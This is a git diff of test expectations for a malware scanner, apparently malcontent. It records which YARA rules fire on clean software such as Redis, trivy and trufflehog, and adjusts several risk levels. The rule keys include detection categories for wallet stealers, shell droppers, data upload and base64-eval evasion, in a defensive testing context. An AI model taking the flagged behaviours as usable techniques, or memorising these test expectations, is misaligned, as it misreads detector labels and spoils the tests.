[socket](https://github.com/search?q=socket&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | -| LOW | [ref/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc.yara#etc_path) | path reference within /etc | [/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | -| LOW | [ref/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | -| LOW | [ref/site/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/site/url.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | -| LOW | [ref/words/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| HIGH | [combo/degrader/linux_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/degrader/linux_paths.yara#linux_critical_system_paths_small_elf) | ELF accesses multiple critical Linux paths | | +| MEDIUM | [dylib/symbol/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | +| MEDIUM | [exec/shell_echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell_echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | +| MEDIUM | [fs/file/times/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | +| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | +| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | +| MEDIUM | [net/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | +| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[createPidFile](https://github.com/search?q=createPidFile&type=code) | +| MEDIUM | [process/name/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | +| MEDIUM | [process/username/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | +| MEDIUM | [procfs/arbitrary/pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | +| MEDIUM | [ref/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | +| MEDIUM | [ref/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/ip_port.yara#ip_and_port) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | +| MEDIUM | [ref/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) | +| MEDIUM | [ref/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | +| MEDIUM | [ref/words/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | +| MEDIUM | [ref/words/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | +| LOW | [dylib/address/check](https://github.com/chainguard-dev/malcontent/blob/main/rules/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | +| LOW | [env/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | +| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlink](https://github.com/search?q=unlink&type=code) | +| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | +| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | +| LOW | [fs/lock/update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | +| LOW | [fs/tempfile/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | +| LOW | [kernel/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | +| LOW | [net/hostport/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | +| LOW | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/socket/local/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-local-address.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| LOW | [random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | +| LOW | [ref/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc.yara#etc_path) | path reference within /etc | [/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | +| LOW | [ref/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | +| LOW | [ref/site/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/site/url.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | +| LOW | [ref/words/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) | diff --git a/test_data/linux/clean/runtime-security-fentry.o.simple b/test_data/linux/clean/runtime-security-fentry.o.simple index 1d8685b9..c442aa54 100644 --- a/test_data/linux/clean/runtime-security-fentry.o.simple +++ b/test_data/linux/clean/runtime-security-fentry.o.simple @@ -13,7 +13,6 @@ fs/permission/modify: medium fs/unmount: low kernel/acct: low kernel/module: medium -kernel/module/load: medium kernel/ptrace: medium kernel/seccomp: low net/bpf: medium diff --git a/test_data/linux/clean/runtime-security-syscall-wrapper.o.simple b/test_data/linux/clean/runtime-security-syscall-wrapper.o.simple index 6f45f19e..b023731d 100644 --- a/test_data/linux/clean/runtime-security-syscall-wrapper.o.simple +++ b/test_data/linux/clean/runtime-security-syscall-wrapper.o.simple @@ -14,7 +14,6 @@ fs/permission/modify: medium fs/unmount: low kernel/acct: low kernel/module: medium -kernel/module/load: medium kernel/ptrace: medium kernel/seccomp: low net/bpf: medium diff --git a/test_data/linux/clean/runtime-security.o.simple b/test_data/linux/clean/runtime-security.o.simple index 4faad3e6..e7111ba8 100644 --- a/test_data/linux/clean/runtime-security.o.simple +++ b/test_data/linux/clean/runtime-security.o.simple @@ -13,7 +13,6 @@ fs/permission/modify: medium fs/unmount: low kernel/acct: low kernel/module: medium -kernel/module/load: medium kernel/ptrace: medium kernel/seccomp: low net/bpf: medium diff --git a/test_data/linux/clean/searchindex.json.simple b/test_data/linux/clean/searchindex.json.simple new file mode 100644 index 00000000..9bd40de2 --- /dev/null +++ b/test_data/linux/clean/searchindex.json.simple @@ -0,0 +1,62 @@ +# linux/clean/searchindex.json: high +3P/threat_hunting/dd: medium +3P/threat_hunting/keylogger: medium +admin/package/install: medium +admin/pip_install: medium +admin/system_directories: medium +combo/dropper/shell: medium +combo/recon/docker: medium +compression/bzip2: low +crypto/file/encrypter: medium +data/embedded/html: medium +evasion/rootkit: medium +exec/program: medium +exec/shell_command: medium +fs/directory/create: low +fs/file/delete: low +fs/file/delete/forcibly: medium +fs/file/times/set: medium +fs/mount: low +fs/watch: low +kernel/platform: low +kernel/sysinfo: medium +net/dns/servers: low +net/dns/txt: low +net/fetch: medium +net/icmp: medium +net/socket/listen: low +net/socket/send: low +net/ssh: medium +net/upload: medium +persist/crontab: medium +process/chdir: low +process/chdir/unusual: medium +process/chroot: low +process/executable_path: low +random/insecure: low +ref/daemon: medium +ref/path/boot: medium +ref/path/dev: medium +ref/path/etc: low +ref/path/etc/resolv.conf: low +ref/path/tmp: medium +ref/path/users: medium +ref/path/usr/local: medium +ref/path/var: low +ref/path/var/log: medium +ref/program/sudo: medium +ref/site/url: low +ref/words/agent: medium +ref/words/backdoor: high +ref/words/dropper: medium +ref/words/exploit: high +ref/words/infected: medium +ref/words/malicious: medium +ref/words/obfuscate: low +ref/words/password: low +ref/words/plugin: low +ref/words/rootkit: medium +ref/words/spoof: medium +ref/words/trojan: medium +service/start: low +shell/exec: medium diff --git a/test_data/linux/clean/slirp4netns.simple b/test_data/linux/clean/slirp4netns.simple index 90af261f..a8b711fb 100644 --- a/test_data/linux/clean/slirp4netns.simple +++ b/test_data/linux/clean/slirp4netns.simple @@ -1,5 +1,4 @@ # linux/clean/slirp4netns: high -combo/critical_paths: medium combo/net/scan_tool: medium env/GCONV_PATH: low env/HOME: low @@ -12,6 +11,7 @@ env/TMPDIR: low env/USER: low exec/program: medium exec/program/background: low +false_positives/slirp: low fd/epoll: low fs/attributes/set: medium fs/directory/create: low @@ -41,7 +41,6 @@ kernel/acct: low kernel/hostname/set: low kernel/key/management: low kernel/module: medium -kernel/module/load: medium kernel/netlink: low kernel/perfmon: low kernel/pivot_root: low diff --git a/test_data/linux/clean/trivy.simple b/test_data/linux/clean/trivy.simple index 9802228e..6c4fe445 100644 --- a/test_data/linux/clean/trivy.simple +++ b/test_data/linux/clean/trivy.simple @@ -14,7 +14,6 @@ cloud/google/metadata: low cloud/google/storage: low combo/backdoor/iptables: medium combo/backdoor/kill_rm: medium -combo/critical_paths: medium combo/dropper/shell: high combo/net/host_port: medium combo/net/tunnel_proxy: medium @@ -134,7 +133,7 @@ net/url/request: medium net/websocket: medium net/wireless: low process/chdir: low -process/chdir/unusual: high +process/chdir/unusual: medium process/chroot: low process/executable_path: low process/groupid/set: low @@ -170,7 +169,6 @@ ref/site/github_api: low ref/site/github_raw: medium ref/site/http/dynamic: medium ref/site/url: low -ref/words/backdoor: high ref/words/collection: medium ref/words/exclamation: medium ref/words/heartbeat: medium diff --git a/test_data/linux/clean/trufflehog.md b/test_data/linux/clean/trufflehog.md index 14f7f9b6..53ee92c0 100644 --- a/test_data/linux/clean/trufflehog.md +++ b/test_data/linux/clean/trufflehog.md @@ -23,7 +23,6 @@ | MEDIUM | [3P/threat_hunting/userenum](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#UserEnum_offensive_tool_keyword) | [references 'UserEnum' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [userenum](https://github.com/search?q=userenum&type=code) | | MEDIUM | [archives/unarchive](https://github.com/chainguard-dev/malcontent/blob/main/rules/archives/unarchive.yara#unarchive) | unarchives files | [UnarchiveProject](https://github.com/search?q=UnarchiveProject&type=code)
[unarchiveadmin](https://github.com/search?q=unarchiveadmin&type=code)
[unarchiveapp_configurations](https://github.com/search?q=unarchiveapp_configurations&type=code) | | MEDIUM | [archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code) | -| MEDIUM | [combo/critical_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/critical_paths.yara#linux_critical_system_paths_medium) | accesses multiple critical Linux paths | [/proc/cpuinfoDefaultMetriccollect_coun](https://github.com/search?q=%2Fproc%2FcpuinfoDefaultMetriccollect_coun&type=code)
[/proc/errno](https://github.com/search?q=%2Fproc%2Ferrno&type=code)
[/proc/seH](https://github.com/search?q=%2Fproc%2FseH&type=code)
[/proc/self/auxv](https://github.com/search?q=%2Fproc%2Fself%2Fauxv&type=code)
[/proc/self/cgroupcpu.cfs_period_uscont](https://github.com/search?q=%2Fproc%2Fself%2Fcgroupcpu.cfs_period_uscont&type=code)
[/proc/self/exeuserArenaStateGC](https://github.com/search?q=%2Fproc%2Fself%2FexeuserArenaStateGC&type=code)
[/proc/self/mapsjstmpllitinterptarinsec](https://github.com/search?q=%2Fproc%2Fself%2Fmapsjstmpllitinterptarinsec&type=code)
[/proc/self/mountinfomarketplace_purcha](https://github.com/search?q=%2Fproc%2Fself%2Fmountinfomarketplace_purcha&type=code)
[/proc/sys/kernel/hostnamegoroutine](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostnamegoroutine&type=code)
[/proc/sys/net/core/somaxconn/usr/local](https://github.com/search?q=%2Fproc%2Fsys%2Fnet%2Fcore%2Fsomaxconn%2Fusr%2Flocal&type=code)
[/sys/class/dmi/id/product_nameNumber](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_nameNumber&type=code)
[/tmp/mysql.sockclientFoundRowsmultiSt](https://github.com/search?q=%2Ftmp%2Fmysql.sockclientFoundRowsmultiSt&type=code)
[/tmp/placeholder/](https://github.com/search?q=%2Ftmp%2Fplaceholder%2F&type=code)
[/usr/bin/envcomments_pop_1comments_pop_2](https://github.com/search?q=%2Fusr%2Fbin%2Fenvcomments_pop_1comments_pop_2&type=code)
[/usr/binH](https://github.com/search?q=%2Fusr%2FbinH&type=code)
[/var/run/slapd/ldapiTLS](https://github.com/search?q=%2Fvar%2Frun%2Fslapd%2FldapiTLS&type=code) | | MEDIUM | [combo/net/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/host_port.yara#go_scan_tool_val) | Uses struct with JSON representations for host:port | [json:"host"](https://github.com/search?q=json%3A%22host%22&type=code)
[json:"hostname"](https://github.com/search?q=json%3A%22hostname%22&type=code)
[json:"ip"](https://github.com/search?q=json%3A%22ip%22&type=code)
[json:"port"](https://github.com/search?q=json%3A%22port%22&type=code) | | MEDIUM | [combo/net/scan_tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [compression/xz](https://github.com/chainguard-dev/malcontent/blob/main/rules/compression/xz.yara#xz_lib) | uses xz library | [ulikunitz/xz](https://github.com/search?q=ulikunitz%2Fxz&type=code) | diff --git a/test_data/linux/clean/vitess/vtadmin.simple b/test_data/linux/clean/vitess/vtadmin.simple index 312b7561..64b7ba54 100644 --- a/test_data/linux/clean/vitess/vtadmin.simple +++ b/test_data/linux/clean/vitess/vtadmin.simple @@ -8,7 +8,6 @@ archives/zip: medium cloud/google/metadata: low combo/backdoor/iptables: medium combo/backdoor/payload: high -combo/critical_paths: medium combo/net/host_port: medium compression/bzip2: low compression/gzip: low diff --git a/test_data/linux/clean/wikiticker-2015-09-12-sampled.json.simple b/test_data/linux/clean/wikiticker-2015-09-12-sampled.json.simple new file mode 100644 index 00000000..3bcb62b7 --- /dev/null +++ b/test_data/linux/clean/wikiticker-2015-09-12-sampled.json.simple @@ -0,0 +1,23 @@ +# linux/clean/wikiticker-2015-09-12-sampled.json: high +combo/stealer/wallet: medium +crypto/aes: low +crypto/fernet: medium +evasion/blocklist/user: medium +fs/file/delete/forcibly: low +net/download: medium +net/http/cookies: medium +net/http/post: medium +net/upload: medium +ref/daemon: medium +ref/ip: medium +ref/ip_port: medium +ref/path/relative: medium +ref/program/minecraft: medium +ref/site/php: medium +ref/site/url: low +ref/words/agent: medium +ref/words/botnet: high +ref/words/exclamation: medium +ref/words/implant: medium +ref/words/infected: medium +ref/words/trojan: medium diff --git a/test_data/linux/clean/wolfictl.simple b/test_data/linux/clean/wolfictl.simple index ed8e1851..c66fdfcd 100644 --- a/test_data/linux/clean/wolfictl.simple +++ b/test_data/linux/clean/wolfictl.simple @@ -12,7 +12,6 @@ cloud/aws/metadata: low cloud/google/metadata: low cloud/google/storage: low combo/backdoor/kill_rm: medium -combo/critical_paths: medium combo/dropper/shell: medium combo/net/raw_flooder: medium combo/net/scan_tool: medium diff --git a/test_data/linux/synthetic/github-attach-fetch.sh.simple b/test_data/linux/synthetic/github-attach-fetch.sh.simple index 8fda1438..72c50076 100644 --- a/test_data/linux/synthetic/github-attach-fetch.sh.simple +++ b/test_data/linux/synthetic/github-attach-fetch.sh.simple @@ -4,7 +4,7 @@ fs/permission/modify: medium net/fetch: medium ref/site/github_attachment: high ref/site/url: low -ref/words/backdoor: high +ref/words/backdoor: critical shell/background_launcher: high shell/exec: medium shell/nohup: medium diff --git a/test_data/python/clean/google-cloud-sdk/mysql.py.simple b/test_data/python/clean/google-cloud-sdk/mysql.py.simple new file mode 100644 index 00000000..a37914cc --- /dev/null +++ b/test_data/python/clean/google-cloud-sdk/mysql.py.simple @@ -0,0 +1,13 @@ +# python/clean/google-cloud-sdk/mysql.py: high +combo/degrader/infection: medium +databases/mysql: medium +evasion/fake/process: high +fs/directory/create: low +fs/file/copy: medium +fs/file/open: low +process/kill/multiple: medium +ref/path/etc: low +ref/path/etc/initd: medium +ref/path/var: low +ref/site/url: low +ref/words/password: low diff --git a/test_data/python/clean/versioneer/versioneer.py.simple b/test_data/python/clean/versioneer/versioneer.py.simple new file mode 100644 index 00000000..d714e45a --- /dev/null +++ b/test_data/python/clean/versioneer/versioneer.py.simple @@ -0,0 +1,9 @@ +# python/clean/versioneer/versioneer.py: medium +data/embedded/base64/terms: medium +data/embedded/base64/url: medium +encoding/base64: low +evasion/base64/decode: medium +evasion/base64/eval: medium +fd/write: low +fs/file/open: low +ref/path/usr/bin: low diff --git a/test_data/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple b/test_data/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple new file mode 100644 index 00000000..b7afeb87 --- /dev/null +++ b/test_data/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple @@ -0,0 +1,54 @@ +# windows/clean/Swashbuckle.AspNetCore.ReDoc.dll: medium +combo/degrader/infection: medium +compression/bzip2: low +compression/gzip: low +data/embedded/base64/url: medium +data/embedded/html: medium +encoding/base64: low +encoding/json/decode: low +encoding/json/encode: low +env/HOME: low +env/LANG: low +env/SHELL: low +env/TEMP: low +env/TERM: low +env/USER: low +env/get: low +exec/cmd: medium +fd/write: low +fs/directory/create: low +fs/directory/remove: low +fs/fifo/create: low +fs/file/write: low +fs/mount: low +fs/node/create: low +fs/permission/modify: medium +fs/quota/manipulate: low +fs/swap/on: low +fs/unmount: low +kernel/platform: low +net/download: medium +net/hostname/resolve: low +net/http/form/upload: medium +net/http/post: medium +net/http/request: low +net/interface/list: medium +net/oauth2: low +net/sftp: medium +net/ssh: medium +net/stat: medium +net/upload: medium +net/url: low +net/url/encode: medium +persist/crontab: medium +process/chroot: low +process/username/get: medium +ref/program/powershell: medium +ref/program/sudo: medium +ref/site/url: low +ref/words/intercept: medium +ref/words/password: low +ref/words/plugin: low +security_controls/linux/selinux: medium +techniques/code_eval: medium +time/clock/sleep: medium diff --git a/test_data/windows/clean/make-win.ps1.simple b/test_data/windows/clean/make-win.ps1.simple new file mode 100644 index 00000000..13bfb5ae --- /dev/null +++ b/test_data/windows/clean/make-win.ps1.simple @@ -0,0 +1,7 @@ +# windows/clean/make-win.ps1: high +3P/InQuest-VT/base64/powershell/directives: high +3P/secuinfra/susp/powershell/base64: medium +data/embedded/base64/terms: medium +evasion/base64/decode: medium +ref/site/url: low +shell/pipe_sh: medium